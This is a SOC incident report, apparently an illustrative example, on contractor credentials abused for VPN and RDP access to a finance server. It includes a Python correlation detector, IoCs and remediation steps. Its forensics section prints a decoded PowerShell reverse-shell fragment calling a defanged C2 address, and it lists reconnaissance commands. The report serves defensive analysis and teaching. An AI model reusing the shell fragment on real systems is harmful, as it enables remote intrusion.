Trusted Relationship Attack Analysis: T1199 – Compromised Contractor Credentials

SIEM Correlation Alert Details

Alert ID: SIEM-CORR-7842-T1199
Alert Time: 2024-01-28 03:15:47 EST
Severity: HIGH (85/100)
Source: Splunk Enterprise Security Correlation Search
Rule: “Contractor Account Anomaly: VPN from Unusual Location + Immediate RDP”
MITRE ATT&CK: T1199 – Trusted Relationship

Correlated Events:

Event 1: VPN Authentication
- Time: 03:00 EST
- User: tsmith (Tom Smith - Contoso Solutions Contractor)
- Source IP: 89.248.165[.]23 (Moscow, Russia)
- VPN Gateway: Palo Alto GlobalProtect
- Authentication: Successful (Username/Password)
- MFA Status: Bypassed (Exception for contractors with token issues)
- Client Device: Windows 10, GP Client 5.2.8
- Usual Location: New York, USA (baseline established over 6 months)

Event 2: RDP Connection
- Time: 03:03 EST
- Source: VPN Pool IP (10.100.50.45)
- Destination: SRV-FIN-01 (Finance Application Server)
- User: tsmith
- Protocol: RDP over port 3389
- Session Duration: 12 minutes
- Activities: PowerShell execution, file enumeration

Event 3: Group Policy Query
- Time: 03:08 EST
- Command: gpresult /r
- User: tsmith
- Target: SRV-FIN-01
- Output: Domain policy enumeration

Event 4: Network Scanning
- Time: 03:12 EST
- Command: net view /domain
- Source: SRV-FIN-01
- User: tsmith
- Targets: Internal domain controllers

Correlation Logic:
- Contractor account (tsmith) normally accesses from New York (09:00-17:00 EST)
- Current login from Russia at 03:00 EST (off-hours, unusual location)
- Immediate RDP to sensitive server (SRV-FIN-01) post-VPN
- Execution of reconnaissance commands unusual for contractor role
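As an added illustration of the correlation logic above (this is example code, not part of the original report or of the Splunk rule it describes), the following Python re-implements the rule over constructed VPN and RDP log lines. The log format, the per-account baseline table, the sensitive-host list and the 10-minute "immediate RDP" window are assumptions made for the example.

```python
from datetime import datetime, timedelta
# Constructed sample log lines (EST, "timestamp|source|user|key=value ..."); not real data.
SAMPLE_LOGS = """\
2024-01-28 03:00:00|vpn|tsmith|result=success country=RU mfa=bypassed
2024-01-28 03:03:00|rdp|tsmith|dest=SRV-FIN-01 src=10.100.50.45
2024-01-27 10:15:00|vpn|tsmith|result=success country=US mfa=ok
2024-01-27 10:17:00|rdp|tsmith|dest=SRV-FIN-01 src=10.100.50.12
2024-01-28 03:05:00|vpn|jdoe|result=success country=RU mfa=ok
"""
# Hypothetical per-account baseline (usual country, working hours) and sensitive-host list.
BASELINE = {u: {"country": "US", "hours": (9, 17)} for u in ("tsmith", "jdoe")}
SENSITIVE_HOSTS = {"SRV-FIN-01"}
RDP_WINDOW = timedelta(minutes=10)  # how soon after VPN an RDP counts as "immediate"

def parse(lines):
    """Parse the pipe-delimited sample format into dicts, oldest event first."""
    events = []
    for line in lines.strip().splitlines():
        ts, source, user, rest = line.split("|", 3)
        fields = dict(kv.split("=", 1) for kv in rest.split())
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
                       "source": source, "user": user, **fields})
    return sorted(events, key=lambda e: e["ts"])

def vpn_anomalies(ev):
    """Ways a successful VPN login deviates from the account's baseline (empty = normal)."""
    base = BASELINE.get(ev["user"])
    if not base or ev.get("result") != "success":
        return []
    reasons = ["unusual_country"] if ev.get("country") != base["country"] else []
    start, end = base["hours"]
    if not start <= ev["ts"].hour < end:
        reasons.append("off_hours")
    return reasons

def correlate(lines):
    """Alert when an anomalous VPN login is followed within RDP_WINDOW by RDP to a sensitive host."""
    events = parse(lines)
    alerts = []
    for i, vpn in enumerate(events):
        reasons = vpn_anomalies(vpn) if vpn["source"] == "vpn" else []
        if not reasons:
            continue
        for later in events[i + 1:]:
            if later["ts"] - vpn["ts"] > RDP_WINDOW:
                break  # events are sorted, so nothing further can be "immediate"
            if (later["source"] == "rdp" and later["user"] == vpn["user"]
                    and later.get("dest") in SENSITIVE_HOSTS):
                alerts.append({"user": vpn["user"], "vpn_ts": vpn["ts"].isoformat(),
                               "reasons": reasons, "mfa": vpn.get("mfa"), "rdp_dest": later["dest"]})
    return alerts
```

Only the tsmith login from Russia fires: the in-hours US login matches the baseline, and jdoe's anomalous login has no RDP to a sensitive host within the window.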

Threat Intelligence Context:

  • IP 89.248.165[.]23 associated with APT29 (Cozy Bear) infrastructure
  • Contractor account belongs to “Contoso Solutions” – third-party financial consulting firm
  • Contractor has limited access to SRV-FIN-01 for maintenance (approved)
  • No travel notifications for contractor to Russia
  • Recent phishing campaign targeting Contoso Solutions employees

SOC Investigation Process

Phase 1: Alert Validation & Initial Triage (03:15-03:30 EST)

Tools: Splunk ES, Palo Alto GlobalProtect VPN Logs, Active Directory

  1. Alert Verification:
    • Confirmed correlation in Splunk Enterprise Security
    • Verified VPN logs show successful authentication
    • Checked RDP logs on SRV-FIN-01 show session establishment
    • Cross-referenced with contractor travel records (none for Russia)
  2. Immediate Containment:
    • Terminated VPN session via GlobalProtect management console
    • Disabled contractor AD account
    • Blocked Russian IP at firewall (Palo Alto Networks)
    • Initiated RDP session termination on SRV-FIN-01
  3. Initial Assessment:
    • Contacted Contoso Solutions security contact (24/7 number)
    • Verified contractor tsmith is sleeping in New York (confirmed via phone)
    • Checked contractor’s recent password change (7 days ago)

Phase 2: Credential Compromise Analysis (03:30-04:30 EST)

Tools: Azure AD Sign-in Logs, Duo Security MFA, LastPass Enterprise

  1. Authentication Timeline:

     ```text
     2024-01-27 19:00 EST: Last legitimate VPN login (New York)
     2024-01-28 02:45 EST: First failed VPN attempt (Russia)
     2024-01-28 02:46-02:58 EST: 14 failed attempts (password spraying)
     2024-01-28 03:00 EST: Successful VPN authentication (Russia)
     2024-01-28 03:03 EST: RDP to SRV-FIN-01
     ```
  2. Credential Source Investigation:
    • Checked password manager (LastPass) access logs – no suspicious access
    • Reviewed phishing simulation results – contractor failed 2 tests last month
    • Contacted Contoso Solutions about recent security incidents
      • Confirmed: Phishing campaign targeting contractors 5 days ago
      • 3 contractors reported credential compromise
  3. MFA Bypass Analysis:
    • Contractor had MFA exception due to “token synchronization issues”
    • Exception granted 30 days ago, never removed
    • MFA logs show no push notifications during anomalous login

Phase 3: Endpoint & Server Forensics (04:30-06:00 EST)

Tools: CrowdStrike Falcon, Velociraptor, Windows Event Logs

  1. SRV-FIN-01 Analysis:
    • Memory dump captured via CrowdStrike Live Response
    • Found PowerShell processes with encoded commands (decoded fragment, C2 address defanged):

      ```powershell
      # Opens a TCP connection to the C2 host and allocates a receive buffer
      $client = New-Object System.Net.Sockets.TCPClient('185.243.112[.]89',443)
      $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}
      ```
    • Registry modifications:
      • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FinanceUpdate
      • HKU\S-1-5-21-...\Software\Microsoft\Terminal Server Client\Servers\SRV-FIN-01
  2. File System Analysis:
    • Created files:
      • C:\Windows\Temp\finance_report.exe (Cobalt Strike beacon)
      • C:\Users\tsmith\AppData\Local\Temp\scan_results.txt (network scan output)
    • Modified files:
      • RDP bitmap cache (contained finance application screenshots)
      • PowerShell history file
  3. Network Traffic Analysis:
    • Reviewed firewall logs from SRV-FIN-01
    • Outbound connections to 185.243.112[.]89:443 (Russia)
    • SMB connections to domain controllers (blocked by network segmentation)
    • No data exfiltration detected (DLP logs clean)

Phase 4: Third-Party Investigation (06:00-07:30 EST)

Tools: ServiceNow Vendor Management, RSA Archer, Email Security Gateway

  1. Contoso Solutions Collaboration:
    • Established conference bridge with their SOC
    • Shared IOCs and timeline
    • Learned: 5 contractor accounts compromised via phishing
    • Their remediation: Password resets, but missed tsmith account
  2. Contractor Access Review:
    • Analyzed contractor’s access privileges:
      • RDP to 3 finance servers (approved)
      • Read access to finance databases (approved)
      • Local admin on SRV-FIN-01 (NOT approved – policy violation)
    • Found: Contractor added to “Local Administrators” group 45 days ago for troubleshooting
  3. Vendor Risk Assessment:
    • Contoso Solutions lacks:
      • MFA enforcement for all contractors
      • Regular security awareness training
      • Compromised credential monitoring

Phase 5: Containment & Remediation (07:30-09:30 EST)

Tools: Active Directory, Group Policy, Cisco ISE, Microsoft Intune

  1. Immediate Containment Actions:
    • Disabled all Contoso Solutions contractor accounts (12 accounts)
    • Blocked all Russian IP ranges at firewall (temporary)
    • Removed local admin rights from all contractor accounts
    • Reset KRBTGT account password (as precaution)
  2. System Remediation:
    • Rebuilt SRV-FIN-01 from known good backup
    • Rotated credentials for all finance service accounts
    • Removed backdoor persistence mechanisms
    • Deployed enhanced logging to all finance servers
  3. Policy Updates:
    • Revoked all MFA exceptions for contractor accounts
    • Implemented time-based access for contractors (9 AM – 5 PM only)
    • Created geo-fencing policy for VPN (block Russia, China, N. Korea)
    • Updated vendor risk assessment questionnaire

Phase 6: Threat Hunting & Scope (09:30-11:00 EST)

Tools: Microsoft Defender for Identity, Tanium, Splunk Advanced Hunting

  1. Lateral Movement Hunting:
    • Searched for Pass-the-Hash/Ticket attacks
    • Checked for anomalous Kerberos ticket requests
    • No evidence of lateral movement beyond SRV-FIN-01
  2. Data Exfiltration Assessment:
    • Reviewed finance database access logs
    • Checked file server access patterns
    • No unauthorized data access detected
  3. Contractor Account Review:
    • All contractor accounts analyzed for similar patterns
    • Found 2 other accounts with failed Russian login attempts
    • No successful logins for other accounts

Jira Incident Report

Ticket: SOC-2024-028
Summary: T1199 – Compromised Contractor Credentials Used for VPN/RDP Access
Status: RESOLVED
Resolution: MALICIOUS – Third-Party Credential Compromise
Priority: P1 – HIGH
Labels: T1199, trusted-relationship, contractor, VPN, RDP, third-party-risk
Components: Identity-Access-Management, Third-Party-Risk, Incident-Response


INCIDENT ANALYSIS REPORT

1. Initial Context:

  • Detection Source: Splunk Enterprise Security Correlation Rule.
  • Alert: “Contractor Account Anomaly: VPN from Unusual Location + Immediate RDP”.
  • User: tsmith (Tom Smith, Contoso Solutions Contractor).
  • Time: 2024-01-28 03:15 EST (detected), 03:00 EST (initial VPN login).
  • Technique: MITRE ATT&CK T1199 (Trusted Relationship) via compromised contractor credentials.

2. Technical Analysis:

  • Attack Vector: Credential theft via phishing campaign targeting Contoso Solutions contractors.
  • Attack Chain:
    1. Contractor credentials compromised via phishing email 5 days ago.
    2. Attackers performed reconnaissance from Russian IP (89.248.165[.]23).
    3. Password spraying attempts (14 failures) followed by successful VPN authentication.
    4. Immediate RDP connection to finance server SRV-FIN-01.
    5. PowerShell execution to download Cobalt Strike beacon.
    6. Attempted lateral movement (blocked by network segmentation).
  • Infrastructure Details:
    • VPN: Palo Alto GlobalProtect with username/password + MFA (MFA bypassed via exception).
    • Target: SRV-FIN-01 (Windows Server 2019, finance application server).
    • C2 Infrastructure: 185.243.112[.]89:443 (Russia, associated with APT29).
    • Contractor Access: Excessive privileges (local admin on SRV-FIN-01).
  • Compromise Details:
    • Credential Source: Phishing campaign targeting Contoso Solutions employees.
    • MFA Bypass: Contractor had permanent MFA exception for “token issues”.
    • Access Abuse: Legitimate credentials used for unauthorized activities.
    • Persistence Attempts: Registry modifications, scheduled task creation.

3. Investigation Findings:

  • Timeline Reconstruction:

    ```text
    2024-01-23:       Contoso Solutions phishing campaign begins
    2024-01-25:       Contractor tsmith credentials compromised (confirmed by Contoso SOC)
    2024-01-28 02:45: First VPN attempt from Russia (failed)
    2024-01-28 03:00: Successful VPN authentication (Russia)
    2024-01-28 03:03: RDP to SRV-FIN-01 established
    2024-01-28 03:05-03:12: Reconnaissance commands executed
    2024-01-28 03:15: SIEM correlation alert triggers
    2024-01-28 03:20: VPN session terminated, account disabled
    2024-01-28 03:30: SRV-FIN-01 isolated from network
    ```
  • Indicators of Compromise (IoCs):

    ```text
    Network Indicators:
    – Source IP: 89.248.165[.]23 (VPN authentication)
    – C2 IP: 185.243.112[.]89:443
    – Malicious Domains: update-finance[.]online, secure-contoso[.]net
    Host-based Indicators:
    – File: finance_report.exe (SHA256: 7a3f9b2c8d1e5f6a…)
    – Registry: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FinanceUpdate
    – Scheduled Task: \Microsoft\Windows\Finance\UpdateCheck
    Credential Indicators:
    – User: tsmith (Contoso Solutions contractor)
    – Unusual location: Moscow, Russia (vs. New York baseline)
    – Off-hours access: 03:00 EST (vs. 09:00-17:00 pattern)
    ```

4. Containment Actions:

  • Immediate Containment (03:15-03:45 EST):
    • Terminated VPN session via GlobalProtect management.
    • Disabled contractor AD account (tsmith).
    • Blocked Russian IP at firewall and VPN gateway.
    • Isolated SRV-FIN-01 from network.
  • Forensic Collection (03:45-06:00 EST):
    • Captured memory and disk images from SRV-FIN-01.
    • Preserved VPN and RDP session logs.
    • Extracted PowerShell execution artifacts.
    • Collected contractor access and permission history.
  • Remediation (06:00-09:30 EST):
    • Rebuilt SRV-FIN-01 from clean backup.
    • Disabled all Contoso Solutions contractor accounts (12 accounts).
    • Removed local admin rights from contractor accounts.
    • Rotated finance service account credentials.

5. Root Cause Analysis:

  • Primary Cause: Third-party credential compromise via phishing.
  • Contributing Factors:
    1. MFA Gap: Permanent MFA exception for contractor accounts.
    2. Excessive Privileges: Contractor had local admin on production server.
    3. Monitoring Gap: No behavioral analytics for contractor accounts.
    4. Vendor Risk: Inadequate security controls at Contoso Solutions.
  • Attack Attribution:
    • TTPs consistent with APT29: Credential phishing, trusted relationship abuse.
    • Motive likely financial data theft or ransomware precursor.
    • Infrastructure overlaps with previous attacks on financial sector.

6. Business Impact:

  • Operational Impact: Finance server offline for 8 hours.
  • Financial Impact: Estimated $15,000 in productivity loss + recovery costs.
  • Regulatory Impact: Potential PCI-DSS compliance concerns (finance data).
  • Third-Party Risk: Contract with Contoso Solutions under review.
  • Data Exposure: Low (no evidence of data access/exfiltration).

7. Remediation & Prevention:

Completed Actions:

  • All compromised systems cleaned and returned to service.
  • Contractor access policies updated and enforced.
  • Contoso Solutions notified and collaborating on security improvements.
  • IOCs distributed to all security tools (SIEM, firewall, EDR, VPN).

Technical Controls Enhanced:

  • Implemented MFA with no exceptions for all contractor accounts.
  • Deployed geo-fencing for VPN (block high-risk countries).
  • Created time-based access controls for contractors (9 AM – 5 PM).
  • Enhanced behavioral analytics for contractor accounts.

Process Improvements:

  • Updated third-party risk management policy.
  • Created incident response playbook for T1199 attacks.
  • Implemented regular contractor access reviews (quarterly).
  • Established security requirements in all contractor agreements.

8. Lessons Learned:

  • Third-Party Risk: Need stronger security requirements for contractors.
  • Privilege Management: Contractors should never have local admin on production systems.
  • MFA Policy: No permanent exceptions allowed; use conditional access instead.
  • Monitoring: Behavioral baselines needed for all third-party accounts.

9. Resolution Verification:

  • Technical Verification:
    • SRV-FIN-01 clean and operational.
    • No active malicious processes detected.
    • Network monitoring shows no C2 communication.
    • Contractor accounts have minimal required privileges.
  • Process Verification:
    • New contractor onboarding process includes security requirements.
    • Regular access reviews scheduled for all third-party accounts.
    • Contoso Solutions implementing enhanced security controls.

10. Conclusion:

This Trusted Relationship attack leveraged compromised contractor credentials to gain unauthorized access to critical finance infrastructure. While the attack demonstrated sophisticated tactics, early detection through behavioral analytics and rapid containment prevented data exfiltration or ransomware deployment. The incident highlights the critical importance of third-party risk management and the principle of least privilege for external accounts.

Closure Rationale: All compromised systems remediated, third-party security controls enhanced, monitoring improved, and no evidence of persistent threat remains.

Follow-up Actions:

  1. Complete security assessment of all third-party vendors (ETA: 1 month)
  2. Implement privileged access management for contractors (ETA: 2 months)
  3. Conduct tabletop exercise focusing on third-party compromise (ETA: 2 weeks)

Analyst: [Walter White], Senior SOC Analyst – Identity Protection Team
Date: 2024-01-28 12:00 EST